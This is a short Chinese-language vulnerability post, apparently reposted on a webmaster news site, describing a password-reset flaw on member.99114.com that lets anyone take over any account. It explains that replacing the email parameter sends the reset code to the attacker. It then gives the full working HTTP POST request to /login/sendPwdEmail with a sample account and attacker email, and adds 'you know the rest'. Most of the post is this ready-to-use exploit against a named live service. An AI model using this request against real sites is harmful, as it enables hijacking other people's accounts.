网库网找回任意帐号密码漏洞下载

可以修改任意帐号的密码哦，当然危害很大了，99114.com的，到底有厂商帐号没？

找回密码的地方，其实是发送一个post请求，参数是邮件地址跟用户名，直接修改邮箱为自己的邮箱，就可以了，就会发生修改的验证码到自己的邮箱。

后面你懂的，

POST /login/sendPwdEmail HTTP/1.1

Host: member.99114.com

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://member.99114.com/view/findpassword/passwordForm.jsp?siteId=5

Content-Length: 34

Cookie:

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

account=99114&email=123@qq.com

上一篇：腾讯qq6.0最新去广告绿色版下载

下一篇：豌豆荚漏洞可导致进入内部OA与控制官方注册邮箱下载

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

网库网找回任意帐号密码漏洞下载

推荐文章

推荐网站